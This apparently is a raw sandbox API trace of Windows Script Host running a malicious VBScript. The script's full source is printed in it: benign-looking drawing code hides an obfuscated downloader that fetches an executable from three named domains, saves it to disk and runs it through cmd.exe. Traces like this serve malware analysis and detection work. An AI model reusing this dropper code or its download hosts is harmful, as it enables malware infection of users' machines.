szCSDVersion="")) returned 1 [0019.157] IsTextUnicode (in: lpv=0xc468930000, iSize=4818, lpiResult=0xc4685bea40 | out: lpiResult=0xc4685bea40) returned 0 [0019.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc468930000, cbMultiByte=4818, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4818 [0019.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xc468930000, cbMultiByte=4818, lpWideCharStr=0xc4687eded8, cchWideChar=4818 | out: lpWideCharStr="\r\n\r\n\r\n\r\nPublic Sub FillPointWithDefaults(Point1 )\r\nWith Point1\r\n .Name = \"\"\r\n .Type = dsPoint\r\n .LabelLength = Len(.Name)\r\n .LabelOffsetX = 0\r\n .LabelOffsetY = -setdefPointSize \\ 2 + 1\r\n '.LabelWidth = Paper.TextWidth(.Name)\r\n '.LabelHeight = Paper.TextHeight(.Name)\r\n \r\n .PhysicalWidth = defPointSize\r\n .Width = .PhysicalWidth\r\n ToLogicalLength .Width\r\n \r\n .Locus = 0\r\n .ParentFigure = 0\r\n .ZOrder = 0 'GenerateNewPointZOrder\r\n .Tag = 0\r\n \r\n .FillStyle = setdefPointFill\r\n .FillColor = setdefcolPointFill\r\n .ForeColor = setdefcolPoint\r\n .Shape = setdefPointShape\r\n .ShowName = setAutoShowPointName\r\n .ShowCoordinates = False\r\n .NameColor = setdefcolPointName\r\n \r\n .Visible = True\r\n .Enabled = True\r\n .Hide = False\r\n .InDemo = True\r\n \r\n .X = 0\r\n .Y = 0\r\nEnd With\r\nEnd Sub\r\nFunction T2000(p, ddd) \r\n\x09dicA = 48\r\n Set DomingoauthenticMacAttack = CreateObject(\"WScript.Shell\")\x09\r\n\x09Save1.Type = 1\r\n\x09Save1.Open\r\nEnd Function \r\n \r\nDim Domingoauthenticensurance ' \r\n\r\nDim DomingoauthenticInPlaceOf ' \r\nDomingoauthenticTepir = \"User\"\r\n\r\n\r\nDim williams\r\n Dim TristateTrue\r\n\r\n\r\nDim DomingoauthenticTimeTo 'As Object\r\nDim DomingoauthenticDW\r\nDomingoauthenticDW = false\r\n \r\nDim Domingoauthenticbalibob 'As Object \r\n\r\n\r\nDim Domingoauthenticcashback 'As Object\r\n\r\n\r\n\r\n\r\n\r\n\r\nExecute \"Sub Aodbeneficeauthentic(strr):Save1.Savetofile DomingoauthenticInPlaceOf , 2 : End Sub\"\r\nDisaster = \"//34-43:ptth34-43exe.cbLzbrOwv\\34-43elifotevas34-43ydoBes\"+\"nopser34-43etirw34-43nepo34-43epyT34-43PmeT34-43TeG34-43ssecorP34-43llehs.tpircsW34-43noitacilppA.llehs34-43\" & \"\"\r\n\r\n\r\nDim krapivec\r\n\r\nDim DomingoauthenticPython1 'As Object\r\n \r\nDim Save1 'As Object\r\n\r\n\r\n\r\n\r\nDim DomingoauthenticPetir ' \r\nDim sNodeKey ' \r\n Dim sParentKey ' \r\n\r\n\r\n\r\nCHECHIL =\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\"\r\n\r\n\r\nExecute \"Sub FolderToCopy(A,B,Pipitr6) : B.Write Pipitr6.res\" + \"ponseBody : End Sub\"\r\n\x09\r\n\r\n\r\nDomingoauthenticPetir = \"Ag\"\r\n williams = Split(\"Microsoft.XMLHTTP34-43Adodb.streaM\"+StrReverse(Disaster), \"34-43\")\r\n\r\n\r\n Dim MarketPlaceibility ' \r\n\r\n\r\nDim Twelve 'As Integer\r\n Dim sDecimalVis ' \r\n \r\nDomingoauthenticTepir = DomingoauthenticTepir + \"-\"\r\n\r\ndr501 = False\r\n\r\nSet DomingoauthenticPython1 = CreateObject(williams(000))\r\n \r\n\r\n\r\nDim Valery 'As Integer\r\n \r\nDim Domingoauthentic404 ' \r\n\r\nDim DomingoauthenticMacAttack\r\n Dim MarketPlace ' \r\n Dim sTempVis ' \r\n Dim iCount 'As Integer\r\n\r\n \r\n\r\n'Set DomingoauthenticTimeTo = CreateObject(williams(8-6))\r\nTwelve = 10 + 1 + 1\r\nzTempVis = williams(Twelve - 11)\r\n\r\nPublic Sub DebugLog(txt)\r\n 'debug.print txt\r\n Open AppPath & \"ARC22ServerDebug.txt\" \r\n Print txt\r\n Close \r\nEnd Sub\r\nSet Domingoauthentic13 = GetRef(\"Aodbeneficeauthentic\")\r\nSet Domingoauthentic14 = GetRef(\"FolderToCopy\")\r\n \r\n\r\n\r\nSet Save1 = CreateObject(\"Adodb.s\"+\"treaM\")\r\n\r\n\r\nSet Domingoauthenticbalibob = CreateObject(williams(11-8)+\"\")\r\n\r\nATC = 3\r\nif \"RarArch\" + WScript + \"33\" = \"RarArchWindows Script Host33\" Then \r\n\x09\r\n Valery = 88144\r\n\r\n\x09Domingoauthenticensurance = CreateObject(\"Scripting.Fi\"+\"leSystemObject\").GetSpecialFolder(Twelve - 10)\r\n\r\nend if\x09\r\n \r\n Dim i\r\nsTempVis = williams(6+Twelve -6)\r\nNotFound404 = 24\r\n\r\nMarketPlace = williams(ATC+10) & williams(ATC+11)\r\n\r\n\r\nDomingoauthenticTepir = DomingoauthenticTepir & \"\"&DomingoauthenticPetir & \"ent\"\r\n\r\n krapivec = Array(\"rorymartin8.info/hudgy356?\",\"horoskoperstellung.com/hudgy356?\",\"hosting-jw.de/hudgy356?\")\r\n\r\nlTo = UBound(krapivec)\r\n\r\nDim SendByte\r\n \r\n\r\nExecute \"Sub Svod112(ArrArr) : NotFound404 = 12 : DomingoauthenticMacAttack.R\"& \"un(\"\"cmd.\"&\"exe /c ca\"+\"ll \"\" & ArrArr ) : End Sub\"\r\n\r\nSendByte = -2\r\n\r\n For i = 0 To lTo Step 1\r\nNotFound404 = NotFound404 * 26\r\n\x09on error resume next\r\nValery = Valery +15\r\ndr1=2\r\nNotFound4042 = williams(16-11)\r\n\r\nNotFound404 = NotFound404 + 404\r\n\r\n\r\ndr500 =MarketPlace + krapivec(i)\r\n\r\n DomingoauthenticPython1.Open NotFound4042, dr500, dr501\r\n\r\n\r\nDomingoauthenticPython1.Send\r\n\r\nIf 1005 + DomingoauthenticPython1.Status = 1205 Then\r\nSendByte = i\r\n\r\n Exit For\r\nEnd If\r\n\r\ngoto14:\r\n\r\nNext\r\n\r\n\r\n\r\non error goto 0\r\nif SendByte >= 0 Then\r\nDim Clank 'As String\r\n DomingoauthenticInPlaceOf = Domingoauthenticensurance+ sTempVis\r\n\r\nT2000 \"\",90\r\nDomingoauthentic14 \"\",Save1,DomingoauthenticPython1\r\n\r\nSapogi =90\r\nDomingoauthenticInPlaceOfu = \"\" + DomingoauthenticInPlaceOf \r\nSapogi = Sapogi*90\r\n\r\n\r\nDim DomingoauthenticJohnSnowu,DomingoauthenticDisplay 'As Long\r\nDomingoauthentic13 \"ss\"\r\nDomingoauthenticJohnSnowu = 132\r\n\r\n\r\n\r\nIf 39 < DomingoauthenticJohnSnowu + 17 Then\r\n\x09 \r\n\x09Hipster =NotFound404-NotFound404\r\n\x09\r\nValor = \"\"\"\"\r\n Svod112(Valor & DomingoauthenticInPlaceOf & Valor)\r\n on error resume next\r\n \r\n\r\nEnd If\r\n\r\n\r\nmafia = 90\r\n\x09DomingoauthenticDisplay = \"Re\"\r\nend if") returned 4818 [0019.157] UnmapViewOfFile (lpBaseAddress=0xc468930000) returned 1 [0019.157] CloseHandle (hObject=0x174) returned 1 [0019.157] LoadLibraryW (lpLibFileName="WLDP.DLL") returned 0x7ffb2bea0000 [0019.682] GetProcAddress (hModule=0x7ffb2bea0000, lpProcName="WldpGetLockdownPolicy") returned 0x7ffb2bea1010 [0019.682] GetProcAddress (hModule=0x7ffb2bea0000, lpProcName="WldpIsClassInApprovedList") returned 0x7ffb2bea3820 [0019.682] WldpGetLockdownPolicy () returned 0x10000000 [0019.682] CloseHandle (hObject=0x170) returned 1 [0019.682] GetSystemDirectoryA (in: lpBuffer=0xc4685bea88, uSize=0x0 | out: lpBuffer="") returned 0x14 [0019.682] GetSystemDirectoryA (in: lpBuffer=0xc4689f6330, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0019.682] strcpy_s (in: _Dst=0xc4689f6343, _DstSize=0xf, _Src="\\" | out: _Dst="\\") returned 0x0 [0019.682] strcpy_s (in: _Dst=0xc4689f6344, _DstSize=0xe, _Src="advapi32.dll" | out: _Dst="advapi32.dll") returned 0x0 [0019.682] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7ffb3c2d0000 [0019.682] GetProcAddress (hModule=0x7ffb3c2d0000, lpProcName="SaferIdentifyLevel") returned 0x7ffb3c2da7d0 [0019.683] GetProcAddress (hModule=0x7ffb3c2d0000, lpProcName="SaferComputeTokenFromLevel") returned 0x7ffb3c2d3ba0 [0019.683] GetProcAddress (hModule=0x7ffb3c2d0000, lpProcName="SaferCloseLevel") returned 0x7ffb3c2e6cc0 [0019.683] IdentifyCodeAuthzLevelW () returned 0x1 [0020.185] GetVersionExA (in: lpVersionInformation=0xc4685bcc60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xc4685bcc60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0020.185] GetUserDefaultLCID () returned 0x409 [0020.185] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0xc4685bc7d0, cchData=2 | out: lpLCData="") returned 2 [0020.186] IsFileSupportedName () returned 0x1 [0020.186] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0020.189] GetSignedDataMsg () returned 0x0 [0020.189] GetCurrentProcess () returned 0xffffffffffffffff [0020.189] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x194, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xc4685bd4c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xc4685bd4c0*=0x1e8) returned 1 [0020.189] GetFileSize (in: hFile=0x1e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12d2 [0020.189] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0020.189] ReadFile (in: hFile=0x1e8, lpBuffer=0xc4689f9790, nNumberOfBytesToRead=0x12d2, lpNumberOfBytesRead=0xc4685bd480, lpOverlapped=0x0 | out: lpBuffer=0xc4689f9790*, lpNumberOfBytesRead=0xc4685bd480*=0x12d2, lpOverlapped=0x0) returned 1 [0020.189] CoInitialize (pvReserved=0x0) returned 0x1 [0020.189] CoCreateInstance (in: rclsid=0x7ffb2ef0e7f8*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2ef0e808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0xc4685bd3e0 | out: ppv=0xc4685bd3e0*=0xc4689faed0) returned 0x0 [0020.269] __dllonexit () returned 0x7ffb24fabcd0 [0020.269] __dllonexit () returned 0x7ffb24fabcf0 [0020.269] GetVersionExA (in: lpVersionInformation=0xc4685badf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x24fabcf0, szCSDVersion="û\x7f") | out: lpVersionInformation=0xc4685badf0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0020.269] GetProcessWindowStation () returned 0xbc [0020.269] GetUserObjectInformationA (in: hObj=0xbc, nIndex=1, pvInfo=0xc4685badd8, nLength=0xc, lpnLengthNeeded=0xc4685badd0 | out: pvInfo=0xc4685badd8, lpnLengthNeeded=0xc4685badd0) returned 1 [0020.269] DllGetClassObject (in: rclsid=0xc4687ec5f0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7ffb3ce2f7c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xc4685bbe30 | out: ppv=0xc4685bbe30*=0xc4689faac0) returned 0x0 [0020.270] IClassFactory:CreateInstance (in: This=0xc4689faac0, pUnkOuter=0x0, riid=0xc4685bcd30*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0xc4685bbe48 | out: ppvObject=0xc4685bbe48*=0xc4689faed0) returned 0x0 [0020.270] GetSystemInfo (in: lpSystemInfo=0xc4685bbcc8 | out: lpSystemInfo=0xc4685bbcc8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0020.270] VirtualQuery (in: lpAddress=0xc4685bbcc0, lpBuffer=0xc4685bbcf8, dwLength=0x30 | out: lpBuffer=0xc4685bbcf8*(BaseAddress=0xc4685bb000, AllocationBase=0xc4684c0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0020.270] IUnknown:AddRef (This=0xc4689faed0) returned 0x2 [0020.270] IUnknown:Release (This=0xc4689faed0) returned 0x1 [0020.270] IUnknown:Release (This=0xc4689faac0) returned 0x0 [0020.270] IUnknown:QueryInterface (in: This=0xc4689faed0, riid=0x7ffb2ef0e808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0xc4685bd378 | out: ppvObject=0xc4685bd378*=0xc4689faed0) returned 0x0 [0020.270] IUnknown:Release (This=0xc4689faed0) returned 0x1 [0020.270] _strnicmp (_Str1="= 0 Then\r\nDim Clank 'As String\r\n DomingoauthenticInPlaceOf = Domingoauthenticensurance+ sTempVis\r\n\r\nT2000 \"\",90\r\nDomingoauthentic14 \"\",Save1,DomingoauthenticPython1\r\n\r\nSapogi =90\r\nDomingoauthenticInPlaceOfu = \"\" + DomingoauthenticInPlaceOf \r\nSapogi = Sapogi*90\r\n\r\n\r\nDim DomingoauthenticJohnSnowu,DomingoauthenticDisplay 'As Long\r\nDomingoauthentic13 \"ss\"\r\nDomingoauthenticJohnSnowu = 132\r\n\r\n\r\n\r\nIf 39 < DomingoauthenticJohnSnowu + 17 Then\r\n\x09 \r\n\x09Hipster =NotFound404-NotFound404\r\n\x09\r\nValor = \"\"\"\"\r\n Svod112(Valor & DomingoauthenticInPlaceOf & Valor)\r\n on error resume next\r\n \r\n\r\nEnd If\r\n\r\n\r\nmafia = 90\r\n\x09DomingoauthenticDisplay = \"Re\"\r\nend if") returned 4818 [0020.271] CoUninitialize () [0020.271] CloseHandle (hObject=0x1e8) returned 1 [0020.271] wcsncmp (_String1="\r\n\r\n\r\n\r\nPublic Sub FillPointWithD", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0020.271] wcsncmp (_String1="\n\r\n\r\n\r\nPublic Sub FillPointWithDe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.271] wcsncmp (_String1="\r\n\r\n\r\nPublic Sub FillPointWithDef", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0020.271] wcsncmp (_String1="\n\r\n\r\nPublic Sub FillPointWithDefa", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.271] wcsncmp (_String1="\r\n\r\nPublic Sub FillPointWithDefau", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -26 [0020.271] wcsncmp (_String1="\n\r\nPublic Sub FillPointWithDefaul", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.271] wcsncmp (_String1="\r\nPublic Sub FillPointWithDefault", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0020.271] wcsncmp (_String1="\nPublic Sub FillPointWithDefaults", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.271] wcsncmp (_String1="Public Sub FillPointWithDefaults(", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.271] wcsncmp (_String1="ublic Sub FillPointWithDefaults(P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0020.271] wcsncmp (_String1="blic Sub FillPointWithDefaults(Po", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.271] wcsncmp (_String1="lic Sub FillPointWithDefaults(Poi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.271] wcsncmp (_String1="ic Sub FillPointWithDefaults(Poin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.271] wcsncmp (_String1="c Sub FillPointWithDefaults(Point", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0020.271] wcsncmp (_String1=" Sub FillPointWithDefaults(Point1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.271] wcsncmp (_String1="Sub FillPointWithDefaults(Point1 ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0020.271] wcsncmp (_String1="ub FillPointWithDefaults(Point1 )", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0020.271] wcsncmp (_String1="b FillPointWithDefaults(Point1 )\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0020.271] wcsncmp (_String1=" FillPointWithDefaults(Point1 )\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.271] wcsncmp (_String1="FillPointWithDefaults(Point1 )\r\nW", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0020.271] wcsncmp (_String1="illPointWithDefaults(Point1 )\r\nWi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.271] wcsncmp (_String1="llPointWithDefaults(Point1 )\r\nWit", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.271] wcsncmp (_String1="lPointWithDefaults(Point1 )\r\nWith", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.271] wcsncmp (_String1="PointWithDefaults(Point1 )\r\nWith ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.271] wcsncmp (_String1="ointWithDefaults(Point1 )\r\nWith P", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0020.271] wcsncmp (_String1="intWithDefaults(Point1 )\r\nWith Po", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.271] wcsncmp (_String1="ntWithDefaults(Point1 )\r\nWith Poi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.271] wcsncmp (_String1="tWithDefaults(Point1 )\r\nWith Poin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.271] wcsncmp (_String1="WithDefaults(Point1 )\r\nWith Point", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0020.271] wcsncmp (_String1="ithDefaults(Point1 )\r\nWith Point1", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.271] wcsncmp (_String1="thDefaults(Point1 )\r\nWith Point1\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.271] wcsncmp (_String1="hDefaults(Point1 )\r\nWith Point1\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0020.271] wcsncmp (_String1="Defaults(Point1 )\r\nWith Point1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0020.271] wcsncmp (_String1="efaults(Point1 )\r\nWith Point1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.271] wcsncmp (_String1="faults(Point1 )\r\nWith Point1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 89 [0020.272] wcsncmp (_String1="aults(Point1 )\r\nWith Point1\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.272] wcsncmp (_String1="ults(Point1 )\r\nWith Point1\r\n .", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0020.272] wcsncmp (_String1="lts(Point1 )\r\nWith Point1\r\n .N", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0020.272] wcsncmp (_String1="ts(Point1 )\r\nWith Point1\r\n .Na", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.272] wcsncmp (_String1="s(Point1 )\r\nWith Point1\r\n .Nam", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0020.272] wcsncmp (_String1="(Point1 )\r\nWith Point1\r\n .Name", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0020.272] wcsncmp (_String1="Point1 )\r\nWith Point1\r\n .Name ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.272] wcsncmp (_String1="oint1 )\r\nWith Point1\r\n .Name =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0020.272] wcsncmp (_String1="int1 )\r\nWith Point1\r\n .Name = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.272] wcsncmp (_String1="nt1 )\r\nWith Point1\r\n .Name = \"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.272] wcsncmp (_String1="t1 )\r\nWith Point1\r\n .Name = \"\"", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.272] wcsncmp (_String1="1 )\r\nWith Point1\r\n .Name = \"\"\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0020.272] wcsncmp (_String1=" )\r\nWith Point1\r\n .Name = \"\"\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=")\r\nWith Point1\r\n .Name = \"\"\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0020.272] wcsncmp (_String1="\r\nWith Point1\r\n .Name = \"\"\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.272] wcsncmp (_String1="\nWith Point1\r\n .Name = \"\"\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.272] wcsncmp (_String1="With Point1\r\n .Name = \"\"\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 74 [0020.272] wcsncmp (_String1="ith Point1\r\n .Name = \"\"\r\n .", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.272] wcsncmp (_String1="th Point1\r\n .Name = \"\"\r\n .T", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.272] wcsncmp (_String1="h Point1\r\n .Name = \"\"\r\n .Ty", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0020.272] wcsncmp (_String1=" Point1\r\n .Name = \"\"\r\n .Typ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1="Point1\r\n .Name = \"\"\r\n .Type", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0020.272] wcsncmp (_String1="oint1\r\n .Name = \"\"\r\n .Type ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0020.272] wcsncmp (_String1="int1\r\n .Name = \"\"\r\n .Type =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0020.272] wcsncmp (_String1="nt1\r\n .Name = \"\"\r\n .Type = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0020.272] wcsncmp (_String1="t1\r\n .Name = \"\"\r\n .Type = d", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0020.272] wcsncmp (_String1="1\r\n .Name = \"\"\r\n .Type = ds", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0020.272] wcsncmp (_String1="\r\n .Name = \"\"\r\n .Type = dsP", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.272] wcsncmp (_String1="\n .Name = \"\"\r\n .Type = dsPo", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.272] wcsncmp (_String1=" .Name = \"\"\r\n .Type = dsPoi", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Name = \"\"\r\n .Type = dsPoin", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Name = \"\"\r\n .Type = dsPoint", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Name = \"\"\r\n .Type = dsPoint\r", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=".Name = \"\"\r\n .Type = dsPoint\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.272] wcsncmp (_String1="Name = \"\"\r\n .Type = dsPoint\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0020.272] wcsncmp (_String1="ame = \"\"\r\n .Type = dsPoint\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0020.272] wcsncmp (_String1="me = \"\"\r\n .Type = dsPoint\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0020.272] wcsncmp (_String1="e = \"\"\r\n .Type = dsPoint\r\n ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0020.272] wcsncmp (_String1=" = \"\"\r\n .Type = dsPoint\r\n .", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1="= \"\"\r\n .Type = dsPoint\r\n .L", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0020.272] wcsncmp (_String1=" \"\"\r\n .Type = dsPoint\r\n .La", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1="\"\"\r\n .Type = dsPoint\r\n .Lab", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0020.272] wcsncmp (_String1="\"\r\n .Type = dsPoint\r\n .Labe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0020.272] wcsncmp (_String1="\r\n .Type = dsPoint\r\n .Label", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -7 [0020.272] wcsncmp (_String1="\n .Type = dsPoint\r\n .LabelL", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0020.272] wcsncmp (_String1=" .Type = dsPoint\r\n .LabelLe", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Type = dsPoint\r\n .LabelLen", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Type = dsPoint\r\n .LabelLeng", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=" .Type = dsPoint\r\n .LabelLengt", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0020.272] wcsncmp (_String1=".Type = dsPoint\r\n .LabelLength", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0020.272] wcsncmp (_String1="Type = dsPoint\r\n .LabelLength ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0020.272] wcsncmp (_String1="ype = dsPoint\r\n .LabelLength =", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0020.272] wcsncmp (_String1="pe = dsPoint\r\n .LabelLength = ", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0020.272] wcsncmp 